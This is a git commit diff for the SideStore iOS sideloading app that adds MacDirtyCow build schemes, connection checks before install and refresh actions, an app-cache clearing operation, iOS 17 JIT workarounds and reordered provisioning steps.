bugfix(MDC): fix minor overlooks

Signed-off-by: June Park <rjp2030@outlook.com>

.github/CODEOWNERS

@@ -1 +1 @@
-*       @JoeMatt @lonkelle
+*       @JoeMatt @lonkelle @nythepegasus @Spidy123222 @SternXD

.github/workflows/stable.yml

@@ -3,6 +3,7 @@ on:
   push:
     tags:
       - '[0-9]+.[0-9]+.[0-9]+' # example: 1.0.0
+  workflow_dispatch:
 
 jobs:
   build:

.gitmodules

@@ -9,7 +9,7 @@
 	url = https://github.com/libimobiledevice/libusbmuxd.git
 [submodule "Dependencies/libplist"]
 	path = Dependencies/libplist
-	url = https://github.com/libimobiledevice/libplist.git
+	url = https://github.com/SideStore/libplist.git
 [submodule "Dependencies/MarkdownAttributedString"]
 	path = Dependencies/MarkdownAttributedString
 	url = https://github.com/chockenberry/MarkdownAttributedString.git

AltBackup/Assets.xcassets/Background.colorset/Contents.json

@@ -5,9 +5,9 @@
         "color-space" : "srgb",
         "components" : {
           "alpha" : "1.000",
-          "blue" : "0.518",
-          "green" : "0.502",
-          "red" : "0.004"
+          "blue" : "175",
+          "green" : "4",
+          "red" : "115"
         }
       },
       "idiom" : "universal"
@@ -23,9 +23,9 @@
         "color-space" : "srgb",
         "components" : {
           "alpha" : "1.000",
-          "blue" : "0.404",
-          "green" : "0.322",
-          "red" : "0.008"
+          "blue" : "150",
+          "green" : "3",
+          "red" : "99"
         }
       },
       "idiom" : "universal"

AltStore.xcodeproj/xcshareddata/xcschemes/MacDirtyCow.xcscheme

@@ -0,0 +1,67 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<Scheme
+   LastUpgradeVersion = "1420"
+   version = "1.3">
+   <BuildAction
+      parallelizeBuildables = "YES"
+      buildImplicitDependencies = "YES">
+      <BuildActionEntries>
+         <BuildActionEntry
+            buildForTesting = "YES"
+            buildForRunning = "YES"
+            buildForProfiling = "YES"
+            buildForArchiving = "YES"
+            buildForAnalyzing = "YES">
+            <BuildableReference
+               BuildableIdentifier = "primary"
+               BlueprintIdentifier = "BDE94B3D2B15EEDA00B506A1"
+               BuildableName = "MacDirtyCow.framework"
+               BlueprintName = "MacDirtyCow"
+               ReferencedContainer = "container:AltStore.xcodeproj">
+            </BuildableReference>
+         </BuildActionEntry>
+      </BuildActionEntries>
+   </BuildAction>
+   <TestAction
+      buildConfiguration = "Debug"
+      selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB"
+      selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB"
+      shouldUseLaunchSchemeArgsEnv = "YES">
+      <Testables>
+      </Testables>
+   </TestAction>
+   <LaunchAction
+      buildConfiguration = "Debug"
+      selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB"
+      selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB"
+      launchStyle = "0"
+      useCustomWorkingDirectory = "NO"
+      ignoresPersistentStateOnLaunch = "NO"
+      debugDocumentVersioning = "YES"
+      debugServiceExtension = "internal"
+      allowLocationSimulation = "YES">
+   </LaunchAction>
+   <ProfileAction
+      buildConfiguration = "Release"
+      shouldUseLaunchSchemeArgsEnv = "YES"
+      savedToolIdentifier = ""
+      useCustomWorkingDirectory = "NO"
+      debugDocumentVersioning = "YES">
+      <MacroExpansion>
+         <BuildableReference
+            BuildableIdentifier = "primary"
+            BlueprintIdentifier = "BDE94B3D2B15EEDA00B506A1"
+            BuildableName = "MacDirtyCow.framework"
+            BlueprintName = "MacDirtyCow"
+            ReferencedContainer = "container:AltStore.xcodeproj">
+         </BuildableReference>
+      </MacroExpansion>
+   </ProfileAction>
+   <AnalyzeAction
+      buildConfiguration = "Debug">
+   </AnalyzeAction>
+   <ArchiveAction
+      buildConfiguration = "Release"
+      revealArchiveInOrganizer = "YES">
+   </ArchiveAction>
+</Scheme>

AltStore.xcodeproj/xcshareddata/xcschemes/SideStore MacDirtyCow.xcscheme

@@ -0,0 +1,78 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<Scheme
+   LastUpgradeVersion = "1420"
+   version = "1.3">
+   <BuildAction
+      parallelizeBuildables = "YES"
+      buildImplicitDependencies = "YES">
+      <BuildActionEntries>
+         <BuildActionEntry
+            buildForTesting = "YES"
+            buildForRunning = "YES"
+            buildForProfiling = "YES"
+            buildForArchiving = "YES"
+            buildForAnalyzing = "YES">
+            <BuildableReference
+               BuildableIdentifier = "primary"
+               BlueprintIdentifier = "BDE94A972B15E4D300B506A1"
+               BuildableName = "SideStore MacDirtyCow.app"
+               BlueprintName = "SideStore MacDirtyCow"
+               ReferencedContainer = "container:AltStore.xcodeproj">
+            </BuildableReference>
+         </BuildActionEntry>
+      </BuildActionEntries>
+   </BuildAction>
+   <TestAction
+      buildConfiguration = "Debug"
+      selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB"
+      selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB"
+      shouldUseLaunchSchemeArgsEnv = "YES">
+      <Testables>
+      </Testables>
+   </TestAction>
+   <LaunchAction
+      buildConfiguration = "Debug"
+      selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB"
+      selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB"
+      launchStyle = "0"
+      useCustomWorkingDirectory = "NO"
+      ignoresPersistentStateOnLaunch = "NO"
+      debugDocumentVersioning = "YES"
+      debugServiceExtension = "internal"
+      allowLocationSimulation = "YES">
+      <BuildableProductRunnable
+         runnableDebuggingMode = "0">
+         <BuildableReference
+            BuildableIdentifier = "primary"
+            BlueprintIdentifier = "BDE94A972B15E4D300B506A1"
+            BuildableName = "SideStore MacDirtyCow.app"
+            BlueprintName = "SideStore MacDirtyCow"
+            ReferencedContainer = "container:AltStore.xcodeproj">
+         </BuildableReference>
+      </BuildableProductRunnable>
+   </LaunchAction>
+   <ProfileAction
+      buildConfiguration = "Release"
+      shouldUseLaunchSchemeArgsEnv = "YES"
+      savedToolIdentifier = ""
+      useCustomWorkingDirectory = "NO"
+      debugDocumentVersioning = "YES">
+      <BuildableProductRunnable
+         runnableDebuggingMode = "0">
+         <BuildableReference
+            BuildableIdentifier = "primary"
+            BlueprintIdentifier = "BDE94A972B15E4D300B506A1"
+            BuildableName = "SideStore MacDirtyCow.app"
+            BlueprintName = "SideStore MacDirtyCow"
+            ReferencedContainer = "container:AltStore.xcodeproj">
+         </BuildableReference>
+      </BuildableProductRunnable>
+   </ProfileAction>
+   <AnalyzeAction
+      buildConfiguration = "Debug">
+   </AnalyzeAction>
+   <ArchiveAction
+      buildConfiguration = "Release"
+      revealArchiveInOrganizer = "YES">
+   </ArchiveAction>
+</Scheme>

AltStore/App IDs/AppIDsViewController.swift

@@ -90,14 +90,21 @@ private extension AppIDsViewController
                 cell.bannerView.button.isUserInteractionEnabled = false
                 
                 cell.bannerView.buttonLabel.isHidden = false
-                
+
                 let currentDate = Date()
                 
-                let numberOfDays = expirationDate.numberOfCalendarDays(since: currentDate)
-                let numberOfDaysText = (numberOfDays == 1) ? NSLocalizedString("1 day", comment: "") : String(format: NSLocalizedString("%@ days", comment: ""), NSNumber(value: numberOfDays))
-                cell.bannerView.button.setTitle(numberOfDaysText.uppercased(), for: .normal)
+                let formatter = DateComponentsFormatter()
+                formatter.unitsStyle = .full
+                formatter.includesApproximationPhrase = false
+                formatter.includesTimeRemainingPhrase = false
+                formatter.allowedUnits = [.minute, .hour, .day]
+                formatter.maximumUnitCount = 1
                 
-                attributedAccessibilityLabel.mutableString.append(String(format: NSLocalizedString("Expires in %@.", comment: ""), numberOfDaysText) + " ")
+                cell.bannerView.button.setTitle((formatter.string(from: currentDate, to: expirationDate) ?? NSLocalizedString("Unknown", comment: "")).uppercased(), for: .normal)
+                
+                // formatter.includesTimeRemainingPhrase = true
+                
+                // attributedAccessibilityLabel.mutableString.append((formatter.string(from: currentDate, to: expirationDate) ?? NSLocalizedString("Unknown", comment: "")) + " ")
             }
             else
             {

AltStore/Browse/BrowseViewController.swift

@@ -8,6 +8,7 @@
 
 import UIKit
 
+import minimuxer
 import AltStoreCore
 import Roxas
 
@@ -264,7 +265,13 @@ private extension BrowseViewController
             previousProgress?.cancel()
             return
         }
-        
+
+        if !minimuxer.ready() {
+            let toastView = ToastView(error: MinimuxerError.NoConnection)
+            toastView.show(in: self)
+            return
+        }
+
         _ = AppManager.shared.install(app, presentingViewController: self) { (result) in
             DispatchQueue.main.async {
                 switch result

AltStore/LaunchViewController.swift

@@ -81,7 +81,7 @@ final class LaunchViewController: RSTLaunchViewController, UIDocumentPickerDeleg
         } else {
             // Show an alert explaining the pairing file
             // Create new Alert
-            let dialogMessage = UIAlertController(title: "Pairing File", message: "Select the pairing file for your device. For more information, go to https://wiki.sidestore.io/guides/install#pairing-process", preferredStyle: .alert)
+            let dialogMessage = UIAlertController(title: "Pairing File", message: "Select the pairing file for your device. For more information, go to https://wiki.sidestore.io/guides/getting-started/#pairing-file", preferredStyle: .alert)
             
             // Create OK button with action handler
             let ok = UIAlertAction(title: "OK", style: .default, handler: { (action) -> Void in
@@ -155,7 +155,12 @@ final class LaunchViewController: RSTLaunchViewController, UIDocumentPickerDeleg
             try! FileManager.default.removeItem(at: FileManager.default.documentsDirectory.appendingPathComponent("\(pairingFileName)"))
             displayError("minimuxer failed to start, please restart SideStore. \((error as? LocalizedError)?.failureReason ?? "UNKNOWN ERROR!!!!!! REPORT TO GITHUB ISSUES!")")
         }
-        start_auto_mounter(documentsDirectory)
+        if #available(iOS 17, *) {
+            // TODO: iOS 17 and above have a new JIT implementation that is completely broken in SideStore :(
+        }
+        else {
+            start_auto_mounter(documentsDirectory)
+        }
     }
 }
 

AltStore/Managing Apps/AppManager.swift

@@ -307,6 +307,16 @@ extension AppManager
             presentingViewController.present(alertController, animated: true, completion: nil)
         }
     }
+    
+    func clearAppCache(completion: @escaping (Result<Void, Error>) -> Void)
+    {
+        let clearAppCacheOperation = ClearAppCacheOperation()
+        clearAppCacheOperation.resultHandler = { result in
+            completion(result)
+        }
+        
+        self.run([clearAppCacheOperation], context: nil)
+    }
 }
 
 extension AppManager
@@ -754,6 +764,12 @@ extension AppManager
         let progress = self.refreshProgress[app.bundleIdentifier]
         return progress
     }
+    
+    func isActivelyManagingApp(withBundleID bundleID: String) -> Bool
+    {
+        let isActivelyManaging = self.installationProgress.keys.contains(bundleID) || self.refreshProgress.keys.contains(bundleID)
+        return isActivelyManaging
+    }
 }
 
 extension AppManager
@@ -808,12 +824,6 @@ private extension AppManager
         }
     }
     
-    func isActivelyManagingApp(withBundleID bundleID: String) -> Bool
-    {
-        let isActivelyManaging = self.installationProgress.keys.contains(bundleID) || self.refreshProgress.keys.contains(bundleID)
-        return isActivelyManaging
-    }
-    
     @discardableResult
     private func perform(_ operations: [AppOperation], presentingViewController: UIViewController?, group: RefreshGroup) -> RefreshGroup
     {
@@ -948,7 +958,13 @@ private extension AppManager
         }
         else
         {
+            DispatchQueue.main.schedule {
+                UIApplication.shared.isIdleTimerDisabled = UserDefaults.standard.isIdleTimeoutDisableEnabled
+            }
             performAppOperations()
+            DispatchQueue.main.schedule {
+                UIApplication.shared.isIdleTimerDisabled = false
+            }
         }
         
         return group
@@ -1027,6 +1043,32 @@ private extension AppManager
         verifyOperation.addDependency(downloadOperation)
         
         
+        /* Refresh Anisette Data */
+        let refreshAnisetteDataOperation = FetchAnisetteDataOperation(context: group.context)
+        refreshAnisetteDataOperation.resultHandler = { (result) in
+            switch result
+            {
+            case .failure(let error): context.error = error
+            case .success(let anisetteData): group.context.session?.anisetteData = anisetteData
+            }
+        }
+        refreshAnisetteDataOperation.addDependency(verifyOperation)
+
+
+        /* Fetch Provisioning Profiles */
+        let fetchProvisioningProfilesOperation = FetchProvisioningProfilesOperation(context: context)
+        fetchProvisioningProfilesOperation.additionalEntitlements = additionalEntitlements
+        fetchProvisioningProfilesOperation.resultHandler = { (result) in
+            switch result
+            {
+            case .failure(let error): context.error = error
+            case .success(let provisioningProfiles): context.provisioningProfiles = provisioningProfiles
+            }
+        }
+        fetchProvisioningProfilesOperation.addDependency(refreshAnisetteDataOperation)
+        progress.addChild(fetchProvisioningProfilesOperation.progress, withPendingUnitCount: 5)
+
+
         /* Deactivate Apps (if necessary) */
         let deactivateAppsOperation = RSTAsyncBlockOperation { [weak self] (operation) in
             do
@@ -1042,6 +1084,12 @@ private extension AppManager
                 {
                     throw error
                 }
+                
+                guard let profiles = context.provisioningProfiles else { throw OperationError.invalidParameters }
+                if !profiles.contains(where: { $1.isFreeProvisioningProfile == true }) {
+                    operation.finish()
+                    return
+                }
                                 
                 guard let app = context.app, let presentingViewController = context.authenticatedContext.presentingViewController else { throw OperationError.invalidParameters }
                 
@@ -1061,7 +1109,7 @@ private extension AppManager
                 operation.finish()
             }
         }
-        deactivateAppsOperation.addDependency(verifyOperation)
+        deactivateAppsOperation.addDependency(fetchProvisioningProfilesOperation)
         
         
         /* Patch App */
@@ -1136,32 +1184,6 @@ private extension AppManager
         patchAppOperation.addDependency(deactivateAppsOperation)
         
         
-        /* Refresh Anisette Data */
-        let refreshAnisetteDataOperation = FetchAnisetteDataOperation(context: group.context)
-        refreshAnisetteDataOperation.resultHandler = { (result) in
-            switch result
-            {
-            case .failure(let error): context.error = error
-            case .success(let anisetteData): group.context.session?.anisetteData = anisetteData
-            }
-        }
-        refreshAnisetteDataOperation.addDependency(patchAppOperation)
-        
-        
-        /* Fetch Provisioning Profiles */
-        let fetchProvisioningProfilesOperation = FetchProvisioningProfilesOperation(context: context)
-        fetchProvisioningProfilesOperation.additionalEntitlements = additionalEntitlements
-        fetchProvisioningProfilesOperation.resultHandler = { (result) in
-            switch result
-            {
-            case .failure(let error): context.error = error
-            case .success(let provisioningProfiles): context.provisioningProfiles = provisioningProfiles
-            }
-        }
-        fetchProvisioningProfilesOperation.addDependency(refreshAnisetteDataOperation)
-        progress.addChild(fetchProvisioningProfilesOperation.progress, withPendingUnitCount: 5)
-        
-        
         /* Resign */
         let resignAppOperation = ResignAppOperation(context: context)
         resignAppOperation.resultHandler = { (result) in
@@ -1171,7 +1193,7 @@ private extension AppManager
             case .success(let resignedApp): context.resignedApp = resignedApp
             }
         }
-        resignAppOperation.addDependency(fetchProvisioningProfilesOperation)
+        resignAppOperation.addDependency(patchAppOperation)
         progress.addChild(resignAppOperation.progress, withPendingUnitCount: 20)
         
         
@@ -1214,7 +1236,7 @@ private extension AppManager
         progress.addChild(installOperation.progress, withPendingUnitCount: 30)
         installOperation.addDependency(sendAppOperation)
         
-        let operations = [downloadOperation, verifyOperation, deactivateAppsOperation, patchAppOperation, refreshAnisetteDataOperation, fetchProvisioningProfilesOperation, resignAppOperation, sendAppOperation, installOperation]
+        let operations = [downloadOperation, verifyOperation, refreshAnisetteDataOperation, fetchProvisioningProfilesOperation, deactivateAppsOperation, patchAppOperation, resignAppOperation, sendAppOperation, installOperation]
         group.add(operations)
         self.run(operations, context: group.context)
         

AltStore/My Apps/MyAppsViewController.swift

@@ -15,6 +15,7 @@ import UniformTypeIdentifiers
 import AltStoreCore
 import AltSign
 import Roxas
+import minimuxer
 
 import Nuke
 
@@ -328,21 +329,25 @@ private extension MyAppsViewController
             let currentDate = Date()
             
             let numberOfDays = installedApp.expirationDate.numberOfCalendarDays(since: currentDate)
-            let numberOfDaysText: String
             
-            if numberOfDays == 1
-            {
-                numberOfDaysText = NSLocalizedString("1 day", comment: "")
-            }
-            else
-            {
-                numberOfDaysText = String(format: NSLocalizedString("%@ days", comment: ""), NSNumber(value: numberOfDays))
-            }
+            let formatter = DateComponentsFormatter()
+            formatter.unitsStyle = .full
+            formatter.includesApproximationPhrase = false
+            formatter.includesTimeRemainingPhrase = false
+            
+            formatter.allowedUnits = [.day, .hour, .minute]
+            
+            formatter.maximumUnitCount = 1
+            
+            
+            
+            cell.bannerView.button.setTitle(formatter.string(from: currentDate, to: installedApp.expirationDate)?.uppercased(), for: .normal)
             
-            cell.bannerView.button.setTitle(numberOfDaysText.uppercased(), for: .normal)
             cell.bannerView.button.accessibilityLabel = String(format: NSLocalizedString("Refresh %@", comment: ""), installedApp.name)
-            
-            cell.bannerView.accessibilityLabel? += ". " + String(format: NSLocalizedString("Expires in %@", comment: ""), numberOfDaysText)
+
+            formatter.includesTimeRemainingPhrase = true
+
+            cell.bannerView.accessibilityLabel? += ". " + (formatter.string(from: currentDate, to: installedApp.expirationDate) ?? NSLocalizedString("Unknown", comment: "")) + " "
             
             // Make sure refresh button is correct size.
             cell.layoutIfNeeded()
@@ -640,6 +645,12 @@ private extension MyAppsViewController
     
     @IBAction func refreshAllApps(_ sender: UIBarButtonItem)
     {
+        if !minimuxer.ready() {
+            let toastView = ToastView(error: MinimuxerError.NoConnection)
+            toastView.show(in: self)
+            return
+        }
+
         self.isRefreshingAllApps = true
         self.collectionView.collectionViewLayout.invalidateLayout()
 
@@ -702,6 +713,12 @@ private extension MyAppsViewController
     
     @IBAction func sideloadApp(_ sender: UIBarButtonItem)
     {
+        if !minimuxer.ready() {
+            let toastView = ToastView(error: MinimuxerError.NoConnection)
+            toastView.show(in: self)
+            return
+        }
+
         let supportedTypes = UTType.types(tag: "ipa", tagClass: .filenameExtension, conformingTo: nil)
         
         let documentPickerViewController = UIDocumentPickerViewController(forOpeningContentTypes: supportedTypes, asCopy: true)
@@ -1006,6 +1023,12 @@ private extension MyAppsViewController
     
     func refresh(_ installedApp: InstalledApp)
     {
+        if !minimuxer.ready() {
+            let toastView = ToastView(error: MinimuxerError.NoConnection)
+            toastView.show(in: self)
+            return
+        }
+
         let previousProgress = AppManager.shared.refreshProgress(for: installedApp)
         guard previousProgress == nil else {
             previousProgress?.cancel()
@@ -1027,6 +1050,12 @@ private extension MyAppsViewController
     
     func activate(_ installedApp: InstalledApp)
     {
+        if !minimuxer.ready() {
+            let toastView = ToastView(error: MinimuxerError.NoConnection)
+            toastView.show(in: self)
+            return
+        }
+
         func finish(_ result: Result<InstalledApp, Error>)
         {
             do
@@ -1103,6 +1132,11 @@ private extension MyAppsViewController
     func deactivate(_ installedApp: InstalledApp, completionHandler: ((Result<InstalledApp, Error>) -> Void)? = nil)
     {
         guard installedApp.isActive else { return }
+        if !minimuxer.ready() {
+            let toastView = ToastView(error: MinimuxerError.NoConnection)
+            toastView.show(in: self)
+            return
+        }
         installedApp.isActive = false
         
         AppManager.shared.deactivate(installedApp, presentingViewController: self) { (result) in
@@ -1164,6 +1198,11 @@ private extension MyAppsViewController
     
     func backup(_ installedApp: InstalledApp)
     {
+        if !minimuxer.ready() {
+            let toastView = ToastView(error: MinimuxerError.NoConnection)
+            toastView.show(in: self)
+            return
+        }
         let title = NSLocalizedString("Start Backup?", comment: "")
         let message = NSLocalizedString("This will replace any previous backups. Please leave SideStore open until the backup is complete.", comment: "")
 
@@ -1203,6 +1242,11 @@ private extension MyAppsViewController
     
     func restore(_ installedApp: InstalledApp)
     {
+        if !minimuxer.ready() {
+            let toastView = ToastView(error: MinimuxerError.NoConnection)
+            toastView.show(in: self)
+            return
+        }
         let message = String(format: NSLocalizedString("This will replace all data you currently have in %@.", comment: ""), installedApp.name)
         let alertController = UIAlertController(title: NSLocalizedString("Are you sure you want to restore this backup?", comment: ""), message: message, preferredStyle: .actionSheet)
         alertController.addAction(.cancel)
@@ -1306,6 +1350,16 @@ private extension MyAppsViewController
     @available(iOS 14, *)
     func enableJIT(for installedApp: InstalledApp)
     {
+        if #available(iOS 17, *) {
+            let toastView = ToastView(error: OperationError.tooNewError)
+            toastView.show(in: self)
+            return
+        }
+        if !minimuxer.ready() {
+            let toastView = ToastView(error: MinimuxerError.NoConnection)
+            toastView.show(in: self)
+            return
+        }
         AppManager.shared.enableJIT(for: installedApp) { result in
             DispatchQueue.main.async {
                 switch result
@@ -1313,7 +1367,7 @@ private extension MyAppsViewController
                 case .success: break
                 case .failure(let error):
                     let toastView = ToastView(error: error)
-                    toastView.show(in: self)
+                    toastView.show(in: self.navigationController?.view ?? self.view, duration: 5)
                 }
             }
         }
@@ -1460,7 +1514,7 @@ extension MyAppsViewController
                 let registeredAppIDs = team.appIDs.count
                 
                 let maximumAppIDCount = 10
-                let remainingAppIDs = max(maximumAppIDCount - registeredAppIDs, 0)
+                let remainingAppIDs = maximumAppIDCount - registeredAppIDs
                 
                 if remainingAppIDs == 1
                 {
@@ -1471,7 +1525,7 @@ extension MyAppsViewController
                     footerView.textLabel.text = String(format: NSLocalizedString("%@ App IDs Remaining", comment: ""), NSNumber(value: remainingAppIDs))
                 }
                 
-                footerView.textLabel.isHidden = false
+                footerView.textLabel.isHidden = remainingAppIDs < 0
                 
             case .individual, .organization, .unknown: footerView.textLabel.isHidden = true
             @unknown default: break

AltStore/Operations/AuthenticationOperation.swift

@@ -12,6 +12,7 @@ import Network
 
 import AltStoreCore
 import AltSign
+import minimuxer
 
 enum AuthenticationError: LocalizedError
 {
@@ -239,7 +240,7 @@ final class AuthenticationOperation: ResultOperation<(ALTTeam, ALTCertificate, A
                 }
                 
                 let activeAppsMinimumVersion = OperatingSystemVersion(majorVersion: 13, minorVersion: 3, patchVersion: 1)
-                if team.type == .free, ProcessInfo.processInfo.isOperatingSystemAtLeast(activeAppsMinimumVersion)
+                if team.type == .free, ProcessInfo.processInfo.isOperatingSystemAtLeast(activeAppsMinimumVersion), !UserDefaults.standard.isMDCEnabled
                 {
                     UserDefaults.standard.activeAppsLimit = ALTActiveAppsLimit
                 }
@@ -593,7 +594,7 @@ private extension AuthenticationOperation
     
     func registerCurrentDevice(for team: ALTTeam, session: ALTAppleAPISession, completionHandler: @escaping (Result<ALTDevice, Error>) -> Void)
     {
-        guard let udid = Bundle.main.object(forInfoDictionaryKey: Bundle.Info.deviceID) as? String else {
+        guard let udid = fetch_udid()?.toString() else {
             return completionHandler(.failure(OperationError.unknownUDID))
         }
         

AltStore/Operations/BackgroundRefreshAppsOperation.swift

@@ -105,8 +105,13 @@ final class BackgroundRefreshAppsOperation: ResultOperation<[String: Result<Inst
         } catch {
             self.finish(.failure(error))
         }
-        start_auto_mounter(documentsDirectory)
-        
+        if #available(iOS 17, *) {
+            // TODO: iOS 17 and above have a new JIT implementation that is completely broken in SideStore :(
+        }
+        else {
+            start_auto_mounter(documentsDirectory)
+        }
+
         self.managedObjectContext.perform {
             print("Apps to refresh:", self.installedApps.map(\.bundleIdentifier))
             

AltStore/Operations/BackupAppOperation.swift

@@ -55,9 +55,8 @@ class BackupAppOperation: ResultOperation<Void>
                     let appName = installedApp.name
                     self.appName = appName
                     
-                    guard let altstoreApp = InstalledApp.fetchAltStore(in: context) else { throw OperationError.appNotFound }
-                    let altstoreOpenURL = altstoreApp.openAppURL
-                    
+                    let altstoreOpenURL = URL(string: "sidestore://")!
+
                     var returnURLComponents = URLComponents(url: altstoreOpenURL, resolvingAgainstBaseURL: false)
                     returnURLComponents?.host = "appBackupResponse"
                     guard let returnURL = returnURLComponents?.url else { throw OperationError.openAppFailed(name: appName) }

AltStore/Operations/ClearAppCacheOperation.swift

@@ -0,0 +1,208 @@
+//
+//  ClearAppCacheOperation.swift
+//  AltStore
+//
+//  Created by Riley Testut on 9/27/22.
+//  Copyright © 2022 Riley Testut. All rights reserved.
+//
+
+import Foundation
+import AltStoreCore
+/*
+struct BatchError: ALTLocalizedError
+{
+
+    enum Code: Int, ALTErrorCode
+    {
+        typealias Error = BatchError
+        
+        case batchError
+    }
+
+    var code: Code = .batchError
+    var underlyingErrors: [Error]
+    
+    var errorTitle: String?
+    var errorFailure: String?
+    
+    init(errors: [Error])
+    {
+        self.underlyingErrors = errors
+    }
+    
+    var errorFailureReason: String {
+        guard !self.underlyingErrors.isEmpty else { return NSLocalizedString("An unknown error occured.", comment: "") }
+        
+        let errorMessages = self.underlyingErrors.map { $0.localizedDescription }
+        
+        let message = errorMessages.joined(separator: "\n\n")
+        return message
+    }
+}
+*/
+@objc(ClearAppCacheOperation)
+class ClearAppCacheOperation: ResultOperation<Void>
+{
+    private let coordinator = NSFileCoordinator()
+    private let coordinatorQueue = OperationQueue()
+    
+    override init()
+    {
+        self.coordinatorQueue.name = "AltStore - ClearAppCacheOperation Queue"
+    }
+    
+    override func main()
+    {
+        super.main()
+        
+        var allErrors = [Error]()
+        
+        self.clearTemporaryDirectory { result in
+            switch result
+            {
+            //case .failure(let batchError as BatchError): allErrors.append(contentsOf: batchError.underlyingErrors)
+            case .failure(let error): allErrors.append(error)
+            case .success: break
+            }
+            
+            self.removeUninstalledAppBackupDirectories { result in
+                switch result
+                {
+                //case .failure(let batchError as BatchError): allErrors.append(contentsOf: batchError.underlyingErrors)
+                case .failure(let error): allErrors.append(error)
+                case .success: break
+                }
+                
+                if allErrors.isEmpty
+                {
+                    self.finish(.success(()))
+                }
+                else
+                {
+                    self.finish(.failure(OperationError.cacheClearError(errors: allErrors.map({ error in
+                        return error.localizedDescription
+                    }))))
+                }
+            }
+        }
+    }
+}
+
+private extension ClearAppCacheOperation
+{
+    func clearTemporaryDirectory(completion: @escaping (Result<Void, Error>) -> Void)
+    {
+        let intent = NSFileAccessIntent.writingIntent(with: FileManager.default.temporaryDirectory, options: [.forDeleting])
+        self.coordinator.coordinate(with: [intent], queue: self.coordinatorQueue) { (error) in
+            do
+            {
+                if let error
+                {
+                    throw error
+                }
+                
+                let fileURLs = try FileManager.default.contentsOfDirectory(at: intent.url,
+                                                                           includingPropertiesForKeys: [],
+                                                                           options: [.skipsSubdirectoryDescendants, .skipsHiddenFiles])
+                var errors = [Error]()
+                
+                for fileURL in fileURLs
+                {
+                    do
+                    {
+                        print("[ALTLog] Removing item from temporary directory:", fileURL.lastPathComponent)
+                        try FileManager.default.removeItem(at: fileURL)
+                    }
+                    catch
+                    {
+                        print("[ALTLog] Failed to remove \(fileURL.lastPathComponent) from temporary directory.", error)
+                        errors.append(error)
+                    }
+                }
+                
+                if !errors.isEmpty
+                {
+                    completion(.failure(OperationError.cacheClearError(errors: errors.map({ error in
+                        return error.localizedDescription
+                    }))))
+                }
+                else
+                {
+                    completion(.success(()))
+                }
+            }
+            catch
+            {
+                completion(.failure(error))
+            }
+        }
+    }
+    
+    func removeUninstalledAppBackupDirectories(completion: @escaping (Result<Void, Error>) -> Void)
+    {
+        guard let backupsDirectory = FileManager.default.appBackupsDirectory else { return completion(.failure(OperationError.missingAppGroup)) }
+        
+        DatabaseManager.shared.persistentContainer.performBackgroundTask { context in
+            let installedAppBundleIDs = Set(InstalledApp.all(in: context).map { $0.bundleIdentifier })
+            
+            let intent = NSFileAccessIntent.writingIntent(with: backupsDirectory, options: [.forDeleting])
+            self.coordinator.coordinate(with: [intent], queue: self.coordinatorQueue) { (error) in
+                do
+                {
+                    if let error
+                    {
+                        throw error
+                    }
+                    
+                    var isDirectory: ObjCBool = false
+                    guard FileManager.default.fileExists(atPath: intent.url.path, isDirectory: &isDirectory), isDirectory.boolValue else {
+                        completion(.success(()))
+                        return
+                    }
+                    
+                    let fileURLs = try FileManager.default.contentsOfDirectory(at: intent.url,
+                                                                               includingPropertiesForKeys: [.isDirectoryKey, .nameKey],
+                                                                               options: [.skipsSubdirectoryDescendants, .skipsHiddenFiles])
+                    var errors = [Error]()
+                    
+                    
+                    for backupDirectory in fileURLs
+                    {
+                        do
+                        {
+                            let resourceValues = try backupDirectory.resourceValues(forKeys: [.isDirectoryKey, .nameKey])
+                            guard let isDirectory = resourceValues.isDirectory, let bundleID = resourceValues.name else { continue }
+
+                            if isDirectory && !installedAppBundleIDs.contains(bundleID) && !AppManager.shared.isActivelyManagingApp(withBundleID: bundleID)
+                            {
+                                print("[ALTLog] Removing backup directory for uninstalled app:", bundleID)
+                                try FileManager.default.removeItem(at: backupDirectory)
+                            }
+                        }
+                        catch
+                        {
+                            print("[ALTLog] Failed to remove app backup directory:", error)
+                            errors.append(error)
+                        }
+                    }
+                    
+                    if !errors.isEmpty
+                    {
+                        completion(.failure(OperationError.cacheClearError(errors: errors.map({ error in
+                            return error.localizedDescription
+                        }))))
+                    }
+                    else
+                    {
+                        completion(.success(()))
+                    }
+                }
+                catch
+                {
+                    print("[ALTLog] Failed to remove app backup directory:", error)
+                    completion(.failure(error))
+                }
+            }
+        }
+    }
+}

AltStore/Operations/DeactivateAppOperation.swift

@@ -39,21 +39,14 @@ final class DeactivateAppOperation: ResultOperation<InstalledApp>
             let allIdentifiers = [installedApp.resignedBundleIdentifier] + appExtensionProfiles
             
             for profile in allIdentifiers {
-                var attempts = 5
-                while (attempts > 0){
-                    print("Remove Provisioning profile attempts left: \(attempts)")
-                    do {
-                        try remove_provisioning_profile(profile)
-                        self.progress.completedUnitCount += 1
-                        installedApp.isActive = false
-                        self.finish(.success(installedApp))
-                        break
-                    } catch {
-                        attempts -= 1
-                        if (attempts <= 0){
-                            self.finish(.failure(error))
-                        }
-                    }
+                do {
+                    try remove_provisioning_profile(profile)
+                    self.progress.completedUnitCount += 1
+                    installedApp.isActive = false
+                    self.finish(.success(installedApp))
+                    break
+                } catch {
+                    self.finish(.failure(error))
                 }
             }
         }

AltStore/Operations/EnableJITOperation.swift

@@ -50,7 +50,7 @@ final class EnableJITOperation<Context: EnableJITContext>: ResultOperation<Void>
                 do {
                     try debug_app(installedApp.resignedBundleIdentifier)
                     self.finish(.success(()))
-                    break
+                    retries = 0
                 } catch {
                     retries -= 1
                     if (retries <= 0){

AltStore/Operations/FetchProvisioningProfilesOperation.swift

@@ -262,10 +262,6 @@ extension FetchProvisioningProfilesOperation
                             {
                                 throw OperationError.maximumAppIDLimitReached(application: application, requiredAppIDs: requiredAppIDs, availableAppIDs: availableAppIDs, nextExpirationDate: expirationDate)
                             }
-                            else
-                            {
-                                throw ALTAppleAPIError(.maximumAppIDLimitReached)
-                            }
                         }
                     }
